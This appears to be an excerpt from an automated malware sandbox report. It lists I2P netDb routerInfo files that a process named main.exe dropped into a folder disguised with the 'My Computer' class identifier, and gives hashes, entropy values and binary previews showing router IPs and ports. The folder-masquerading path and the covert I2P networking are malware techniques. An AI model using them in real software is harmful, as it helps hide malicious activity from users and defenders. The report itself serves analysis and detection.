oYDwd2

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rG\routerInfo-GjnluWZCOZFamNgpSjuHqZuAZwn2D-iWW~n-wGEByzk=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	806
Entropy (8bit):	6.721429773603015
Encrypted:	false
SSDEEP:	12:2emAEOEOEOEOEOEOEOEOEOEKa8ViNOqu3883Ao3tKZQXDjZ91vqpNEAZlgoR:5Jzzzzzzzzzha8ENO/ddoQZ91yjhlvR
MD5:	B8033BC39732AE524262BF55322CD817
SHA1:	FB66EE28BE4882295BF99ECCFE4C053D78FBE93E
SHA-256:	3F0783B3F9685CF225AAFE2854AE4B0ED0AF43C6055A9E35CA347CE9E17B17F1
SHA-512:	AB2A076CC3AC5DC0002D975DF22E621064E39B7DE7944BB4F77110EE1CCB17697B1EEA564A93205095ED5C7B78758A21A228B59BF67F76D07641D5F43ECA6F7E
Malicious:	false
Preview:	C{..u\|..='."...%....7..k..G.B3.z..GT.9yz0.cR.!.LM....1@J...z..GT.9yz0.cR.!.LM....1@J...z..GT.9yz0.cR.!.LM....1@J...z..GT.9yz0.cR.!.LM....1@J...z..GT.9yz0.cR.!.LM....1@J...z..GT.9yz0.cR.!.LM....1@J...z..GT.9yz0.cR.!.LM....1@J...z..GT.9yz0.cR.!.LM....1@J...z..GT.9yz0.cR.!.LM....1@J...z..GT.9yz0.cR.!.LM....1@J...^.n/...[...'y!../...g<...y..U...........................NTCP2.t.host=.78.47.80.55;.i=.6G21pOZeregZESgqJXMuAQ==;.port=.12207;.s=,K5Jvyx1XN8vp8RcbmTeZ2mEmJ5n6nkkuQPEMD5MQZTI=;.v=.2;..........SSU2...caps=.BC;.host=.78.47.80.55;.i=,MyaavxCRxl7NHLUYiZ1MOT-VfKX~VwoRRDq4BHoK6fU=;.port=.12207;.s=,9cOvSQiKl~0A7UgjjCZfRlj1YDH6jkASKq0m9nUDBFg=;.v=.2;..,.caps=.LR;.netId=.2;.router.version=.0.9.62;i.$.p.....E{6.O....r_7k.t.Q.s..T....r...;>..p....w%\.B.;...

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rG\routerInfo-gc3gdjau4ttxyTuNWbCZfbG0CMjI8mCsfzgBaX30qPU=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	987
Entropy (8bit):	6.683040065118697
Encrypted:	false
SSDEEP:	24:kPRwV3wV3wV3wV3wV3wV3wV3wV3wV3wVC/mBqZIUGVJl7QWLV/hKzcz8wpG:mQQQQQQQQQj/lSUGJ5HVpG
MD5:	273A3A6F7385E6B6525249E231BBE8FE
SHA1:	D6E99A49835441B786F8CD01F1BBDE33C0F60622
SHA-256:	F97ACAFFF0C3A910CE119D3EFD856D7C4CA7FCEA65A8B95704B6D802EA6A32D9
SHA-512:	C8CBC3D374A8217058AD7F59A31B49E3150EE892E62C36C94249B253CD0AAFD82E8647F1DF1D69145193D4179A6EE709304F9A926ABB6E3AD0CFB690E8243749
Malicious:	false
Preview:	....W.F......_\|.n;R.3>.oqD_...=........o!fXE.l.'.r.U..m...s$g{.........o!fXE.l.'.r.U..m...s$g{.........o!fXE.l.'.r.U..m...s$g{.........o!fXE.l.'.r.U..m...s$g{.........o!fXE.l.'.r.U..m...s$g{.........o!fXE.l.'.r.U..m...s$g{.........o!fXE.l.'.r.U..m...s$g{.........o!fXE.l.'.r.U..m...s$g{.........o!fXE.l.'.r.U..m...s$g{.........o!fXE.l.'.r.U..m...s$g{.&H_..<h6.-..Dr\..u.u......Df..G.............}............NTCP2.@.caps=.4;.s=,0sSIHxFIU69kl-HkV2H3IyfPc~sb7wdwc03NKWp2NkU=;.v=.2;..........SSU2.{.caps=.4;.i=,fQoJqr25rGBpXlZl6GKmt9XF0XNxwm2RuNOwks73XFM=;.iexp0=.1726475058;.iexp1=.1726476231;.iexp2=.1726477010;.ih0=,rl262weNed7MoXbL3qK8kOH2XR5DVO1ng4-vaCFOxeE=;.ih1=,oyOvQwZmAsqFKF7YxnwBioSflGDg8PnSnFyyaurjg60=;.ih2=,0EsnMziHI~fHyUsa0DO2TiVkhEnhmnX1igcl27-nstg=;.itag0=.3159109689;.itag1=.193068267;.itag2=.1610619978;.s=,ajekH9Iwyr921Wj~G2bsiA8t7BxoHwfBeimG4pFEE1o=;.v=.2;..,.caps=.LU;.netId=.2;.router.version=.0.9.63;.*.o;K...b..T.~8......+.+o.O@.....@nH.6.......t.r.....^.<b9...

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rG\routerInfo-g~lESVFabof4Y~OBKc8ZbA0ZqhBKdatn6aP~W3ZHSQM=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	812
Entropy (8bit):	6.749711073623528
Encrypted:	false
SSDEEP:	24:lwpagagagagagagagagagberxOqL6waxvjQA:liPPPPPPPPPO2jH
MD5:	20F7A142F5B3AE6883FA0E27BE68BEF7
SHA1:	63BC44B15F7ADFFCFBDB033B8188D8CE98FBD77A
SHA-256:	48E83B770CB89049CF0A4CDBC9B14434215190F14CC0C8EFADAD4AB5B4A1172E
SHA-512:	AE0051AFED0B92819346E02CCF7881252849369665D5D66252B2FC0FE431C2089FAC512DB8AAE0DDAE091433689E5B57B2480C0A535236D088FF8DADA125F000
Malicious:	false
Preview:	..9bD.....h._.0.<....r..h..HE!5.......B..y.\E...C..A.y.....5.......B..y.\E...C..A.y.....5.......B..y.\E...C..A.y.....5.......B..y.\E...C..A.y.....5.......B..y.\E...C..A.y.....5.......B..y.\E...C..A.y.....5.......B..y.\E...C..A.y.....5.......B..y.\E...C..A.y.....5.......B..y.\E...C..A.y.....5.......B..y.\E...C..A.y.....aVh;d.V..j"..h.#...B{.T.ssr.^............................NTCP2.w.host=.89.219.212.160;.i=.o1gOrMLP-K2VEwc-G-9RNQ==;.port=.15363;.s=,zdo68vbPFv-1MhRM1IxZg1ExFxhpRAQW5rL7Xg6PFk0=;.v=.2;..........SSU2...caps=.BC;.host=.89.219.212.160;.i=,gbbt34cCSqSI8kI6E-gSEiyrDhaLboEC0G-UZVjZo64=;.port=.15363;.s=,3EsxVmEuJdwLAIRW~HYXHJeSZ0--4R8m1eDu1HnA8E0=;.v=.2;..,.caps=.PR;.netId=.2;.router.version=.0.9.57;.\|...k@..8uo....W...f}p@*.>......E.\|..o.FyJ.......<...Q..%o.....

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rH\routerInfo-Hnzm0bp2CqUIEmeNUWZpT9wLAcVd~10r~nRVx5iDUrw=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	1403
Entropy (8bit):	6.651850631353088
Encrypted:	false
SSDEEP:	24:+CmdxlLCmLPwqGwxjTfAR6/uPMaKxgP2aIc6RD:+CmhCmLPwOe6YPYc6J
MD5:	EA3BBF9011CB33D446A71091B1EDFEA5
SHA1:	15ECEC0E53E3823BECF41F12EA95B188E6CCDAE8
SHA-256:	0582690E830F600C6E071F43E25909209CBF8865145FE41A76D50B4BFA7B4674
SHA-512:	B32D315581E3E0A4A5492696AF9E62E57F05A90C283FDF091A7E9C0134C48A19ED9F541658905352A69EB77016D8A6996AC68E34203A8CAFA36E8D95BF72C716
Malicious:	false
Preview:	...(.,.HjT0..p.J;d.....A.T.d...3..U;rD[............l.Bdz.m...3..U;rD[............l.Bdz.m...3..U;rD[............l.Bdz.m...3..U;rD[............l.Bdz.m...3..U;rD[............l.Bdz.m...3..U;rD[............l.Bdz.m...3..U;rD[............l.Bdz.m...3..U;rD[............l.Bdz.m...3..U;rD[............l.Bdz.m...3..U;rD[............l.Bdz.m.....f...!....iaG:X.\.&.M.....].~.............xa...........NTCP2.@.caps=.4;.s=,X2GkU2KjzLst1ZTylXPMKxRc60GEjgSEgegCVSCIoUA=;.v=.2;..........NTCP2...host=&2404:c807:7c0:1500:9852:2e35:138d:9662;.i=.rVEebX~I~lkHgKc322aqjw==;.port=.28724;.s=,X2GkU2KjzLst1ZTylXPMKxRc60GEjgSEgegCVSCIoUA=;.v=.2;..........SSU2.\|.caps=.4;.i=,x6xZynMjto1lvzDALrLmoGmNR4coPlq4tAPFRRJrdw8=;.iexp0=.1726471724;.iexp1=.1726473653;.iexp2=.1726475174;.ih0=,ADIc1paVmlrAEnqXSHcGy~Rk0dBGcraxRN~6ndNnuCw=;.ih1=,Um4yMok-Ea75a1ZKS32xN3XWaRk4fIejMgqZP-eHtZw=;.ih2=,4Xp7utZS2gUdQ72CEdeSEWpspZFzvountiIxeKs4hxU=;.itag0=.3439885065;.itag1=.1823521675;.itag2=.2632674442;.s=,2Smyr91N95m65r

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rH\routerInfo-Hv8NRP38qhbwjaTod39sFY6Ufe7xUju5Ls13iK-GIYI=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	1143
Entropy (8bit):	6.74205932349655
Encrypted:	false
SSDEEP:	12:m/wRaPRaPRaPRaPRaPRaPRaPRaPRaPRv6mm9JB4E0zts9bpJB4E0ztseAWEWMXJM:IsUUUUUUUUUvPmDmE0OFnmE0ODWEZ+r3
MD5:	B956DB84BF918CA1E6EF70A8616EEAE0
SHA1:	AF03FB5F106CE60CF42396CDE79CC94CBC5ACB93
SHA-256:	5D2382CB458197C31C6BECD8724CCEB5DCBF446F80A56210406A405FB100D8AA
SHA-512:	CD08FF41AB925ED07A029A606A2D59D227C408C2F82931A75EBC4E5A516AEC95E1E52EE38DEB128D3351B2E3E5CE09A3C42FA2BA58B9A656E1CA2D118A64857E
Malicious:	false
Preview:	55..ln.F.)&.R...K..6.1{..H.9d].R.....Be.......y`ol/<...+..d].R.....Be.......y`ol/<...+..d].R.....Be.......y`ol/<...+..d].R.....Be.......y`ol/<...+..d].R.....Be.......y`ol/<...+..d].R.....Be.......y`ol/<...+..d].R.....Be.......y`ol/<...+..d].R.....Be.......y`ol/<...+..d].R.....Be.......y`ol/<...+..d].R.....Be..*.....y`ol/<...+...J.w%.H..me.o.j2...2.R..%{.G.-...........................NTCP2.v.host=.185.207.205.7;.i=.p8jmAPikpNttJg-rRIhIrw==;.port=.54463;.s=,yE9ZGkyvUH0I0DqjI4KgP2XxYEZwoeQn05REBorNxgc=;.v=.2;..........NTCP2...host=.2607:7700:0:53::b9cf:cd07;.i=.p8jmAPikpNttJg-rRIhIrw==;.port=.54463;.s=,yE9ZGkyvUH0I0DqjI4KgP2XxYEZwoeQn05REBorNxgc=;.v=.2;..........SSU2...caps=.C;.host=.185.207.205.7;.i=,QQPjFGwGaRPxCQF8Vxd~sOG7YNql2jv3UPo3PHmEhDM=;.port=.54463;.s=,O-bmYKbP-8ZqoeHI~D4ht-hEBgm~8KYH7zHHETqzM2w=;.v=.2;..........SSU2...caps=.BC;.host=.2607:7700:0:53::b9cf:cd07;.i=,QQPjFGwGaRPxCQF8Vxd~sOG7YNql2jv3UPo3PHmEhDM=;.mtu=.1280;.port=.54463;.s=,O-bmYKbP-8ZqoeHI~D4

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rH\routerInfo-hBdjv-IFVrIP9flrtm1fJDwiIQUVvm~g-jJf~A8irMw=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	1249
Entropy (8bit):	6.645863156841049
Encrypted:	false
SSDEEP:	24:13nsDsDsDsDsDsDsDsDsDsSBrnBR/JL64pR/I3vQMd8r:1ornBOt3vPd8r
MD5:	86847AAFDF1FEC720EBF9FC9006075C7
SHA1:	462D4FA201DEC2CD36F275F3510CBB739510BA25
SHA-256:	5CE7A10743B1ACF408EE07FD74B90E93160EA08991A380EF5BFF5C8B96A76587
SHA-512:	4B46268EDB06EF7011B0B62B1119EC213E28A1E87A93E4975019A4626F35BA8FC06566AAB1A9BC6F4C5C97362AC415E8EFF2278911138230D5D0D287D1D6678E
Malicious:	false
Preview:	.<k]...f..+-qT....V>z....>'~.a.k..-d97....B..&.33...y.H.b.t..k..-d97....B..&.33...y.H.b.t..k..-d97....B..&.33...y.H.b.t..k..-d97....B..&.33...y.H.b.t..k..-d97....B..&.33...y.H.b.t..k..-d97....B..&.33...y.H.b.t..k..-d97....B..&.33...y.H.b.t..k..-d97....B..&.33...y.H.b.t..k..-d97....B..&.33...y.H.b.t..k..-d97....B..&.33...y.H.b.t.$.e..:...A....Q&...A).;.S..............................NTCP2.@.caps=.4;.s=,WVX5S0JsoDlT4bofcd-388nkIQ4fG0C15SWx6wp98V0=;.v=.2;..........NTCP2.@.caps=.6;.s=,WVX5S0JsoDlT4bofcd-388nkIQ4fG0C15SWx6wp98V0=;.v=.2;..........SSU2.\|.caps=.4;.i=,gXogL1WJsvEeIKumwWZsMqoHIXwff3ZQLNf1XmbK7cQ=;.iexp0=.1726477744;.iexp1=.1726477744;.iexp2=.1726477762;.ih0=,GIEXCb9OkV3aTUpTW1GKBMR5M0uY73Yffw5zi4IE9~A=;.ih1=,zJ03fyYlcJa5a3ae4pcro2qrM07jtiDWbK-bUk0ZNI0=;.ih2=,i6D9HJK4Euvki6CGwPuC40fy~~E6VXGECSeSkbvYUUU=;.itag0=.1918973599;.itag1=.1940862708;.itag2=.3608931834;.s=,b9JmssyhXCYGBXzTYHFm0bHl02cGZMGSQDpiTvunBE8=;.v=.2;..........SSU2.q.caps=.6;.i=,gXogL1WJsvEeI

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rH\routerInfo-hZSNuRKGltu~EAL~Xrcb0bgvafnHGIXMQvuovJFingY=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	1355
Entropy (8bit):	6.731674501966078
Encrypted:	false
SSDEEP:	24:9MDEEEEEEEEvHObwncKbX7cKbX21ivYjb6Vrc6acuYFTEdsBjA:9MDHObwcKbQKbG1ivYjb6Vg6aPYC6BM
MD5:	3760A43766F076591CAAD29A98DE42EE
SHA1:	096C57E48C14230198FFCF0799D2F93F99874AFC
SHA-256:	1AAF6FEC2887992CEBD453EDA20C4C5A14D0B5CDF0899D2A6A62358E3C748DAB
SHA-512:	E78A6D254395C1E261D7EF84418A039B824ED6817B89BDB5675A925E8D244BECD29C3BBB4BCF73CAD331967F9F226852791FAA038676EF90FF17153687684882
Malicious:	false
Preview:	..?I\......8$.W.'Q0p>....'.U..V"....VS...0....h....}V......C.."....VS...0....h....}V......C.."....VS...0....h....}V......C.."....VS...0....h....}V......C.."....VS...0....h....}V......C.."....VS...0....h....}V......C.."....VS...0....h....}V......C.."....VS...0....h....}V......C.."....VS...0....h....}V......C.."....VS...0....h....}V......C..J....p........x{'...9.... O.................q............NTCP2.w.host=.101.191.73.121;.i=.txqSj6anL5W4XsdsvVUJ7Q==;.port=.18088;.s=,W3zZyy4EEHcFrpX7PXJlzpKMp7gIFLglu2Qk3F86tU4=;.v=.2;..........NTCP2.@.caps=.6;.s=,W3zZyy4EEHcFrpX7PXJlzpKMp7gIFLglu2Qk3F86tU4=;.v=.2;..........SSU2...caps=.BC;.host=.101.191.73.121;.i=,cELFWj-d2o2kLe9Tkt7ApCk9lAaeHhJyrT0XuO5NSU8=;.port=.18088;.s=,vD0thQ5GP-AGrf6No2uiXMyAz52Iha3psKkX9D7j~zY=;.v=.2;..........SSU2...caps=.6;.i=,cELFWj-d2o2kLe9Tkt7ApCk9lAaeHhJyrT0XuO5NSU8=;.iexp0=.1726478701;.iexp1=.1726478699;.iexp2=.1726478692;.ih0=,wxFXwJ85g1CYuwlVd-W1d-Wj9PnDzIfWNks6l6mzC4k=;.ih1=,GcHz7OnlTPN0QrTW2NyKLs~ljcCMfV

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rJ\routerInfo-j8B~vRknm38vub73yRYK9URCZ69Z~vt9P4x7OMzc0lQ=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	803
Entropy (8bit):	6.6553585670206585
Encrypted:	false
SSDEEP:	12:zGa+dznZkkZRiFVbOS/rX0tF2iu5iY4ph1IAu:HEiSg5OirX4FuEFu
MD5:	4A16ECA0AAC76613DAE9DD08CBCCB7E1
SHA1:	863D9BB7433FFBB87BF68D6B5BCFE23428123456
SHA-256:	5EE79B7E7AFE3D0DD4F1E07BBE32C11CF708B834D6B389C34ED816C13EB8C76A
SHA-512:	2C1009D84DB202DFAEFF7724401D05FCB5B564BC6A2B8BE9434E949B41E493C18A8C758F0955EEC5CBB431B3F1947A61938EBE979D878670ADC0E0D5B00E1D5B
Malicious:	false
Preview:	.b8.4f.5.u.rS=P;Y.94.....&-e%........nk..'.P6.YN_B.......j.........nk..'.P6.YN_B.......j.........nk..'.P6.YN_B.......j.........nk..'.P6.YN_B.......j.........nk..'.P6.YN_B.......j.........nk..'.P6.YN_B.......j.........nk..'.P6.YN_B.......j.........nk..'.P6.YN_B.......j.........nk..'.P6.YN_B.......j.........nk..'.P6.YN_B.......j.....TA....mJt..A0\|..g.b.e..................;%...........SSU2...caps=.B;.host=.85.6.171.9;.i=,32q9nrD5OtvPVi2XD1AFA2q90SY2oHqCj1s9fWJLbLs=;.port=.19675;.s=,~4G1ZDC39kCpDxtSmSGxsfBkKqaJEi8-A-in-qW0kVc=;.v=.2;..........NTCP2.s.host=.85.6.171.9;.i=.~wSV0-rLHGdsVVgrK9XpIw==;.port=.19675;.s=,3nYT~6Wj9jorJvj6GfWpKANgfEECsZgrA~nTfBzW6Gc=;.v=.2;..,.caps=.PR;.netId=.2;.router.version=.0.9.63;..2:....O.PD?...*..[(c..AVz...M......H..z.z{..b..)....H5R.....

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rK\routerInfo-kMOE7p1w8vRvtkpZAUZHFBb2STxdCdIv1ZRwIuEzYAQ=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	811
Entropy (8bit):	6.75936237396757
Encrypted:	false
SSDEEP:	12:029hjuuguuguuguuguuguuguuguuguuguuxMvUWGbidXdaXBHATqKCK0aTah3WOc:N9hj+++++++++fAKO0XZ6qK8d3Wl
MD5:	6EE4C829C3B713D5447094FD7A44204E
SHA1:	C3FD51E4005272A6AF43755E840FF428DB4E1E48
SHA-256:	7E44E1D419ED38E6EBD76095B77C6A147213CFA3C4DB7457F66715C81A892146
SHA-512:	BC8C0BB65B40D4C07B40EA805D1208B7B0E7E4FA16561FA99AC092898EC7950F1ABE938734F1F2962290C31FF24704A0F4365C675593010E3D19307F93015939
Malicious:	false
Preview:	......W..7.U.Ob..j.....Mw.J}?...c}.\|.[e.....q:#K../CVX....Q..\..c}.\|.[e.....q:#K../CVX....Q..\..c}.\|.[e.....q:#K../CVX....Q..\..c}.\|.[e.....q:#K../CVX....Q..\..c}.\|.[e.....q:#K../CVX....Q..\..c}.\|.[e.....q:#K../CVX....Q..\..c}.\|.[e.....q:#K../CVX....Q..\..c}.\|.[e.....q:#K../CVX....Q..\..c}.\|.[e.....q:#K../CVX....Q..\..c}.\|.[e.....q:#K../CVX....Q..\".<.V...&.(.+.H5...PJ........."...........................NTCP2.v.host=.31.13.134.204;.i=.~9TRNyX5sx1czvWNmxzGHQ==;.port=.25275;.s=,zodNIQddX0Ji3tNZkjdrLZloqzmA-Rh0uwIYCEj-3jI=;.v=.2;..........SSU2...caps=.BC;.host=.31.13.134.204;.i=,X~5p50ZlGUVBa4Fh7R5zhsh9n6Mc1HC8LgDMrZSGMyQ=;.port=.25275;.s=,Gyo-3bs1yPp0bM793bjsK1RI3x86dBbVyXBYCC5QxhY=;.v=.2;..-.caps=.XRD;.netId=.2;.router.version=.0.9.63;n...u....?..I...ps:i...r.".]l..-.'nC^..S..B-/+..1.wLt.r9*.sD..

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rL\routerInfo-LH0k4dqueKxlvQMMajtNLlrpB22iQlae4aSBHElIaF4=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	1249
Entropy (8bit):	6.752031390891208
Encrypted:	false
SSDEEP:	24:4TefefefefefefefefefeWQiEorLDpLU0W8FkQJ9v3xLDb303v5x:sqqqqqqqqqnEoPJU0WRec3v7
MD5:	806C400BFFDFC5D5EFE7D926A125772C
SHA1:	BC7424C805FC3A57A1BDCDABA4FB74B46B362604
SHA-256:	D50C92BBA89B08533A65AE197AD9BDFA5E9494952EF3D55D5DEC3EC552CC87F5
SHA-512:	F9F23A9757C3BD732C5FE05466354DDC455AEB58D389597A683767A5D1FC986C30D5E9C64C7E02F37762ED7813A2663E1D9FBC592CF89E1A90F17E0A9D2EE6B4
Malicious:	false
Preview:	Ra$.#W..56\......&Q.?..<......WL.Y......!.4........\|<.J.&+....Y......!.4........\|<.J.&+....Y......!.4........\|<.J.&+....Y......!.4........\|<.J.&+....Y......!.4........\|<.J.&+....Y......!.4........\|<.J.&+....Y......!.4........\|<.J.&+....Y......!.4........\|<.J.&+....Y......!.4........\|<.J.&+....Y......!.4........\|<.J.&+...C.\|w8&.].:6sd.,)..z.l...4.;.Wey.............iJ...........NTCP2.@.caps=.4;.s=,UnxOpmxX6Q6VwnPGWokD87UmxQEaZ2RtzG7EYzz530w=;.v=.2;..........NTCP2.@.caps=.6;.s=,UnxOpmxX6Q6VwnPGWokD87UmxQEaZ2RtzG7EYzz530w=;.v=.2;..........SSU2.\|.caps=.4;.i=,PmFgx0bIrd3ZQGj6OhMwuyKgAprLXJ1a7~z-aACvok4=;.iexp0=.1726478250;.iexp1=.1726478246;.iexp2=.1726478246;.ih0=,L3WS69O400AFmvzrOI7EGxlKnujsETrg2EmlhDMBG~k=;.ih1=,D8MoPkTh1eOUyMzb1FCzadXtpyoVplkisOBtmaOpiyQ=;.ih2=,2esD5kvXsYDXAGNpYa2BMPS0W6v2XhzG2hrif2boH4Q=;.itag0=.1360373990;.itag1=.3542820782;.itag2=.3088341306;.s=,o5wIIQLntiR8RgkAE3vf4Wcv3QnrK9yEf2K0gIokyRY=;.v=.2;..........SSU2.q.caps=.6;.i=,PmFgx0bIrd3ZQ

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rL\routerInfo-lfOTrr7fnYO~1kXuE4clKS0wMnyDgwVVDo7pYmdJvcg=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	810
Entropy (8bit):	6.623619052942211
Encrypted:	false
SSDEEP:	12:kd9p1Yq1Yq1Yq1Yq1Yq1Yq1Yq1Yq1Yq1YfMC8AFQ5PBfECZIYvJdn:O9YKYKYKYKYKYKYKYKYKYf78HB8CZ9Jd
MD5:	31DA7EC6D09DF019326253BE622A31EA
SHA1:	C1622FB7DFB7806269EE7CED57986CBA00A225C0
SHA-256:	CF87E1812AC79A896D8702D787221E45C52CA644C197A89398F64E3923E965FA
SHA-512:	A7F7D83A26AF811234EE4FAB4E543F15053A4632426C9BA58590104E246FE878816008132410DF1DFC1055F9C5288D002111368E48BD69762492FA3EA54D454D
Malicious:	false
Preview:	...l3LW..e....[!=D..p.........wv..S..>.g..QB+.o...X.........v..S..>.g..QB+.o...X.........v..S..>.g..QB+.o...X.........v..S..>.g..QB+.o...X.........v..S..>.g..QB+.o...X.........v..S..>.g..QB+.o...X.........v..S..>.g..QB+.o...X.........v..S..>.g..QB+.o...X.........v..S..>.g..QB+.o...X.........v..S..>.g..QB+.o...X...........n.B....z(..V.Z.g..a[..R7...........................NTCP2.v.host=.86.106.93.104;.i=.CiQ2Iy5TIYpJm3vhXYBEcw==;.port=.14840;.s=,RVNf4wuelS1x7NgZx8DgUYYe-~rE0kNTkG62g6guTyE=;.v=.2;..........SSU2...caps=.BC;.host=.86.106.93.104;.i=,5Nm6Xu3vgc651c50vftSWfcQxyLfEcjgU0URE8738B0=;.port=.14840;.s=,i9eRqyoLXmnQgTjxCNqzwrylf1U2MpzHudvs4Cc6FzU=;.v=.2;..,.caps=.LR;.netId=.2;.router.version=.0.9.60;N.e..."rMy..!..#.y....Ww.[..h..L.R......Z.Do.&.7.J.*.\|N(afL.B.

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rN\routerInfo-nDZz9qLoWY8V5YrFGzWUCrDD3CtqASPvHDwuHUi-cO4=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	1183
Entropy (8bit):	6.71357417480828
Encrypted:	false
SSDEEP:	24:32T4m4m4m4m4m4m4m4m4mFlPmm/g2Ynw+2YTjuSkOi1n9uJkOi1ZsYx8F:32tdv/g2+z2GbACAGYo
MD5:	CE835FE7926DDA3DB35B9065F57F9D45
SHA1:	7CF7EA18E9D713C6965FE39C98C8E50CB204163D
SHA-256:	6E6EE010D3642E509E5B82ACF5F8781F1110EC455D4D475B13C762B20000B825
SHA-512:	AD532D79F4A39073FA1FED71A8FB1A96181BD92DF7F39B5149BE09BAE79169D2D2CE621838CE0FDC8C7E67D59985491402567997F5E61CA97CD8471D49620414
Malicious:	false
Preview:	w.O..:...-.8.....:L.(.{..C..J..E....2....8...Y1..0.b.a.&.R...E....2....8...Y1..0.b.a.&.R...E....2....8...Y1..0.b.a.&.R...E....2....8...Y1..0.b.a.&.R...E....2....8...Y1..0.b.a.&.R...E....2....8...Y1..0.b.a.&.R...E....2....8...Y1..0.b.a.&.R...E....2....8...Y1..0.b.a.&.R...E....2....8...Y1..0.b.a.&.R...E....2....8...Y1..0.b.a.&.R.H.%q6;b....Y...i(.G..._e\.I#.0.[........................NTCP2.v.host=.141.98.234.85;.i=.WUClqi459aEah7FpA~HDpQ==;.port=.42069;.s=,EdFy3l-jAOjf7s8nPtYX4lxP9uV~kJ-SPkwPYX3YBWw=;.v=.2;..........NTCP2.z.host=.2a05:541:111:4::1;.i=.WUClqi459aEah7FpA~HDpQ==;.port=.42069;.s=,EdFy3l-jAOjf7s8nPtYX4lxP9uV~kJ-SPkwPYX3YBWw=;.v=.2;..........SSU2...caps=.BC;.host=.141.98.234.85;.i=,~ayapkVjM8CDB4pWvva~FzmoBtovNIYqHMqinO3UyhI=;.port=.42069;.s=,vJr72hwNystVEw1InD4delli~iBAcJiWvmN5YtBePSw=;.v=.2;..........SSU2...caps=.BC;.host=.2a05:541:111:4::1;.i=,~ayapkVjM8CDB4pWvva~FzmoBtovNIYqHMqinO3UyhI=;.mtu=.1500;.port=.42069;.s=,vJr72hwNystVEw1InD4delli~iBAcJiWvm

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\i2p\netDb\rN\routerInfo-nRzQ2n1bVe-TW-hfWxFe-VeKEHMqnWBMZC17uvWwBKM=.dat

Download File

Process:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:	data
Category:	dropped
Size (bytes):	808
Entropy (8bit):	6.715404310788116
Encrypted:	false
SSDEEP:	12:gzxM+3YYYYYYYYY3Ph62rUUI4iUIf73oqzvag79pwgsURNbN:gNMAYYYYYYYYY3xNPGYqbvhLbN
MD5:	F3A5CB11825D35D7D84A114720F13EF6
SHA1:	3A6126EAAB637917024685DF5FB88BBAC7CB1E7F
SHA-256:	7BD9C4157292BA5FA5E9114CD6D7FC92EF2406CB9DDC6B43B06C568A69822FE4
SHA-512:	A7829088012079E21804D952279DEE27BF3548CE1FDFCE6E1FA8C0704E8461999DE53F26F214854AE5F43D310FED94828C103890F3FED59C304D44A2FD8992D8
Malicious:	false
Preview:	.6R.E.^.@.D N..F........\.......L..E..%....E}.k.nQ.....).?Z.....L..E..%....E}.k.nQ.....).?Z.....L..E..%....E}.k.nQ.....).?Z.....L..E..%....E}.k.nQ.....).?Z.....L..E..%....E}.k.nQ.....).?Z.....L..E..%....E}.k.nQ.....).?Z.....L..E..%....E}.k.nQ.....).?Z.....L..E..%....E}.k.nQ.....).?Z.....L..E..%....E}.k.nQ.....).?Z.....L..E..%....E}.k.nQ.....).?Z.....X.R..H..}..oLG'.).2.Z.l.@..4.............b............NTCP2.u.host=.107.189.6.31;.i=.GcUDkqhzJoOM037IX18z4Q==;.port=.23012;.s=,MJdRJmdJYDHNugZNUjGGJg23n6Fr6dogZreEGNy~ERo=;.v=.2;..........SSU2...caps=.BC;.host=.107.189.6.31;.i=,20ayZ~X1LcKUDjrvTE2coLmh2MVvsuuIXUidQy8Ffiw=;.port=.23012;.s=,~08d~Tn1fsSLSXtUM0Nz9u35oAL7VxpsgP3ZXF5tb1